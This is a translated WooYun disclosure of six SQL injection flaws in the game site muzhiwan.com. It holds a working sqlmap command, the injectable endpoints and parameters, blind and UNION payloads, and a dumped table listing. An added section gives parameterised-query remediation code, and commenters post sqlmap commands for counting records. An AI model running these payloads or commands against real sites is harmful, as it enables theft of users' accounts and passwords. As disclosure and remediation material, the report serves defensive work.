
Vulnerability summary

Defect ID: wooyun-2015-0124079

Title: 6 SQL injections in Muzhiwan (拇指玩) (exposing at least 8 million+ (800W+) user records, including account names and passwords)

Vendor: muzhiwan.com

Author: 凌零1

Submitted: 2015-07-02 17:56

Fix time: 2015-08-16 18:06

Published: 2015-08-16 18:06

Type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: Vendor has confirmed

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2015-07-02: Details sent to the vendor, awaiting the vendor's handling
2015-07-02: Vendor has confirmed; details visible to the vendor only
2015-07-12: Details disclosed to core white hats and relevant domain experts
2015-07-22: Details disclosed to regular white hats
2015-08-01: Details disclosed to intern white hats
2015-08-16: Details disclosed to the public

Brief description:

Leaks the administrator account and password, plus a large volume of user information.

Detailed description:

python sqlmap.py -u "http://www.muzhiwan.com/index.php?action=article&opt=comment_list" --data "aid=&num=1" -p "aid" --level 3 --dbs
1. www.muzhiwan.com/index.php?action=article&opt=comment_list, POST: aid=&num=1, injectable parameter: aid
2. www.muzhiwan.com/index.php?.exe&action=common&opt=speeddownpc&vid=, injectable parameter: vid
3. www.muzhiwan.com/index.php?action=common&opt=otherdown&url=aHR0cDovL3Bhbi5iYWlkdS5jb20vcy8xZ2RLcnBFYg==&vid=&wpclick=2, injectable parameter: vid
4. www.muzhiwan.com/index.php?action=common&opt=speeddown&vid=, injectable parameter: vid
5. www.muzhiwan.com/index.php?action=game&opt=getAjaxComment, POST: num=1&vid=, injectable parameter: vid
6. http://gsv.muzhiwan.com/index.php?action=detail&opt=getAjaxComment, POST: num=1&sid=, injectable parameter: sid

Proof of vulnerability:

Let's try the first one! www.muzhiwan.com/index.php?action=article&opt=comment_list, POST: aid=&num=1

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: aid (POST)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 time-based blind - Parameter replace
Payload: aid=(SELECT (CASE WHEN (7953=7953) THEN SLEEP(5) ELSE 7953*(SELECT 7953 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))&num=1
Type: UNION query
Title: Generic UNION query (random number) - 5 columns
Payload: aid=-7257 UNION ALL SELECT CONCAT(0x71786b7671,0x61414a4b725468786e6f,0x717a626271),1271,1271,1271,1271-- &num=1
---
[11:25:31] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.2.14
back-end DBMS: MySQL 5.0.12
[11:25:31] [INFO] fetching current database
current database: 'mzw'
[11:25:31] [INFO] fetched data logged to text files under 'C:\Users\wjl\.sqlmap\output\www.muzhiwan.com'
[*] shutting down at 11:25:31
C:\Users\wjl\Desktop\sqlmapproject-sqlmap-e8f87bf>python sqlmap.py -u "http://www.muzhiwan.com/index.php?action=article&opt=comment_list " --data "aid=&num=1" -p "aid" --level 3 --current-db




Database: mzw
[216 tables]
+--------------------------------+
| group |
| mzw_users-1 |
| auth |
| auth_group |
| auth_group_relation |
| auth_usergroup |
| group_apply |
| group_glance |
| group_identity |
| group_interior |
| group_member |
| group_member_log |
| group_recommend |
| group_report |
| group_score |
| group_score_list |
| group_topic |
| group_topic_content |
| group_topic_love |
| lanxun_url |
| market_model_info |
| models |
| mzw_ad |
| mzw_ad_p |
| mzw_admin |
| mzw_admin_editlog |
| mzw_admin_gameeditlog |
| mzw_admin_group |
| mzw_bbs_topic |
| mzw_blacklist |
| mzw_c_ad |
| mzw_c_admin |
| mzw_c_channel |
| mzw_c_game |
| mzw_c_game_detail |
| mzw_c_game_down |
| mzw_c_game_snapshot |
| mzw_c_hotsearch |
| mzw_c_uc_mapping |
| mzw_censorword |
| mzw_content_from |
| mzw_cp_bill |
| mzw_cp_contact |
| mzw_cp_fee_ratio |
| mzw_cp_game |
| mzw_cp_game_1 |
| mzw_cp_game_append |
| mzw_cp_game_gift |
| mzw_cp_game_gift_code |
| mzw_cp_game_sdk |
| mzw_cp_game_v |
| mzw_cp_game_v_article |
| mzw_cp_game_v_img |
| mzw_cp_game_v_motion |
| mzw_cp_member |
| mzw_cp_msg |
| mzw_cp_notice |
| mzw_cp_order |
| mzw_cp_pay |
| mzw_cp_sdk |
| mzw_cp_testfee |
| mzw_cp_testin |
| mzw_cp_user |
| mzw_cp_users_resetpwd |
| mzw_crack_wishing |
| mzw_crontab_game |
| mzw_dabaoprogress |
| mzw_datacopypath |
| mzw_day_gamecount |
| mzw_exam_score |
| mzw_exam_title |
| mzw_favorite |
| mzw_feedback |
| mzw_feedback_app |
| mzw_feeds |
| mzw_fetch_html |
| mzw_friend_links |
| mzw_game |
| mzw_game_album |
| mzw_game_album_comment |
| mzw_game_album_comment_reply |
| mzw_game_album_contents |
| mzw_game_article |
| mzw_game_article_auth |
| mzw_game_article_comment |
| mzw_game_article_comment_reply |
| mzw_game_article_detail |
| mzw_game_article_detail_copy |
| mzw_game_article_type |
| mzw_game_article_vote |
| mzw_game_black |
| mzw_game_device_package |
| mzw_game_extend |
| mzw_game_firm |
| mzw_game_firm_comment |
| mzw_game_firm_comment_reply |
| mzw_game_google |
| mzw_game_img_webp |
| mzw_game_net_forum |
| mzw_game_net_gift |
| mzw_game_net_giftbind |
| mzw_game_net_server |
| mzw_game_open |
| mzw_game_search_tags |
| mzw_game_search_tags_bind |
| mzw_game_tags |
| mzw_game_tags_bind |
| mzw_game_tags_type |
| mzw_game_tmp |
| mzw_game_type |
| mzw_game_unzip |
| mzw_game_unzip_diff |
| mzw_game_unzip_sub |
| mzw_game_v |
| mzw_game_v_comment |
| mzw_game_v_comment_reply |
| mzw_game_v_cp |
| mzw_game_v_detail |
| mzw_game_v_diff |
| mzw_game_v_downlist |
| mzw_game_v_downlist_back |
| mzw_game_v_downlist_copy |
| mzw_game_v_downtop |
| mzw_game_v_icon_temp |
| mzw_game_v_img |
| mzw_game_v_img_copy |
| mzw_game_v_img_temp |
| mzw_game_v_video |
| mzw_game_vblacklist |
| mzw_game_vote |
| mzw_gift_bbs |
| mzw_gift_weixin |
| mzw_gift_weixin_copy |
| mzw_gift_weixin_copy1 |
| mzw_google_apps |
| mzw_handle_brand |
| mzw_handle_model |
| mzw_hotword_tab |
| mzw_log_ad_click_201302 |
| mzw_log_downloadgame_0 |
| mzw_log_goodarticle_0 |
| mzw_log_goodgame_0 |
| mzw_log_goodsavegame_2013 |
| mzw_log_login_201301 |
| mzw_log_sf_download_0 |
| mzw_mobile_brand |
| mzw_mobile_cpubrand |
| mzw_mobile_cpubrand_adp |
| mzw_mobile_cpumodel |
| mzw_mobile_forum |
| mzw_mobile_manual_pwd |
| mzw_mobile_model |
| mzw_mobile_modelcode |
| mzw_mobile_modelcode_rel |
| mzw_mobile_verify_message |
| mzw_models |
| mzw_our_company |
| mzw_our_postinfo |
| mzw_pay |
| mzw_pc_feedback |
| mzw_phone_msg_log |
| mzw_project |
| mzw_project_picture |
| mzw_question |
| mzw_question_answer |
| mzw_report_tab |
| mzw_save_game |
| mzw_save_game_blacklist |
| mzw_save_game_category |
| mzw_save_game_comment |
| mzw_save_game_comment_reply |
| mzw_save_game_for |
| mzw_save_game_for_comment |
| mzw_save_game_img |
| mzw_save_game_send |
| mzw_save_gamenotexistgame |
| mzw_sdk_oauth2_authcodes |
| mzw_sdk_oauth2_clients |
| mzw_sdk_oauth2_tokens |
| mzw_sdk_pay_notifyrecord |
| mzw_sdk_pay_orders |
| mzw_sdk_pay_orders_info |
| mzw_sdk_pay_yeepaytoken |
| mzw_sdk_phone_msg_log |
| mzw_short_url |
| mzw_short_url_key |
| mzw_snoopy_game |
| mzw_snoopy_gift |
| mzw_u_test |
| mzw_update |
| mzw_user_game |
| mzw_user_gamev |
| mzw_user_gamevcomment |
| mzw_user_gamevcomment_reply |
| mzw_user_gamevdetail |
| mzw_user_gamevdownlist |
| mzw_user_gamevimg |
| mzw_user_reg |
| mzw_userbehavior |
| mzw_userdevice |
| mzw_userdevice_bind |
| mzw_users |
| mzw_users_1 |
| mzw_users_6 |
| mzw_users_accesstoken |
| mzw_users_origin |
| mzw_users_phone |
| mzw_users_photo_create |
| mzw_users_profile |
| mzw_users_resetpwd |
| mzw_users_sign |
| mzw_weibo_score |
| mzw_zhuanti_comment |
| pre_ucenter_members_cpfrom502 |
| static_sdk_compatibility |
| tmp_02 |
+--------------------------------+


Take a look at one of the tables:

[two screenshots of table contents, not preserved]


Fix recommendation:

Just don't ignore it and it's fine. High Rank please - -!!

Copyright notice: please credit the source when reposting: 凌零1@乌云
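The report gives no code for the fix, so here is an added illustration of the remediation for an endpoint like comment_list (not muzhiwan.com's own code, whose source is not on the page). The injectable parameter aid reaches MySQL as part of the query text, which is why sqlmap could use both a time-based blind payload and a 5-column UNION. The hardened handler validates aid and num as integers and binds them through a prepared statement, so the query structure is fixed before any request data is seen. The table name mzw_game_article_comment appears in the listing above; the column names are assumptions.

```php
<?php
// Added example, not muzhiwan.com's code. Column names are assumed.

// Vulnerable pattern: the POST values are interpolated into the SQL text.
// A value such as "-7257 UNION ALL SELECT ..." or "(SELECT (CASE WHEN ... SLEEP(5) ...))"
// becomes part of the query, which matches the two payload types sqlmap reported.
function comment_list_vulnerable(mysqli $db, array $post)
{
    $aid = $post['aid'];
    $num = $post['num'];
    $sql = "SELECT id, uid, content, ctime FROM mzw_game_article_comment "
         . "WHERE aid = $aid ORDER BY ctime DESC LIMIT $num";
    return $db->query($sql);
}

// Hardened pattern: reject anything that is not a positive integer, then bind
// the values as typed parameters. Escaping alone would not help here, because
// aid is used unquoted; the query must be parameterised.
function comment_list_safe(mysqli $db, array $post)
{
    $aid = filter_var(isset($post['aid']) ? $post['aid'] : '',
                      FILTER_VALIDATE_INT,
                      array('options' => array('min_range' => 1)));
    $num = filter_var(isset($post['num']) ? $post['num'] : '',
                      FILTER_VALIDATE_INT,
                      array('options' => array('min_range' => 1, 'max_range' => 100)));
    if ($aid === false || $num === false) {
        return false; // caller should answer with HTTP 400, not try to "clean" the input
    }

    $stmt = $db->prepare(
        'SELECT id, uid, content, ctime FROM mzw_game_article_comment '
      . 'WHERE aid = ? ORDER BY ctime DESC LIMIT ?'
    );
    if ($stmt === false) {
        return false;
    }
    $stmt->bind_param('ii', $aid, $num);
    $stmt->execute();
    // get_result() needs the mysqlnd driver (PHP 5.3+); on the PHP 5.2.14
    // build reported above, use bind_result() and fetch() instead.
    return $stmt->get_result();
}
```

The same change applies to the vid and sid parameters in the other five endpoints listed in the detailed description: each is a numeric identifier, so integer validation plus a bound parameter closes both the blind and the UNION vector at once.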


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 20

Confirmed at: 2015-07-02 18:04

Vendor reply:

Thanks, we will fix this as soon as possible.

Latest status:

None yet


Vulnerability rating:

Comments

  1. 2015-07-02 18:05 | 浩天 certified white hat ( regular white hat | Rank:915 vulns:79 | on vacation...)

    Confirmed within seconds

  2. 2015-07-02 18:06 | 天地不仁 以万物为刍狗 ( regular white hat | Rank:977 vulns:264 | 天地本不仁 万物为刍狗)

    Still more injections?

  3. 2015-07-02 18:07 | 天地不仁 以万物为刍狗 ( regular white hat | Rank:977 vulns:264 | 天地本不仁 万物为刍狗)

    @浩天 Muzhiwan has always confirmed within seconds····

  4. 2015-07-02 18:32 | 镱鍚 ( passer-by | Rank:6 vulns:4 | 。。!)

    6666

  5. 2015-07-02 19:06 | answer ( regular white hat | Rank:347 vulns:45 | answer)

    In awe

  6. 2015-08-16 21:37 | 日出东方 ( regular white hat | Rank:157 vulns:51 )

    Master, how did you count the 8 million records...

  7. 2015-08-17 09:20 | h3hz ( passer-by | Rank:15 vulns:1 | newbie looking for a home)

    @日出东方 select count('字段') from 表名

  8. 2015-08-17 09:23 | 日出东方 ( regular white hat | Rank:157 vulns:51 )

    @h3hz Many thanks

  9. 2015-08-17 21:07 | mtfly ( passer-by | Rank:26 vulns:6 | can't do anything)

    @日出东方 sqlmap -u "url" -D=database -T=table --count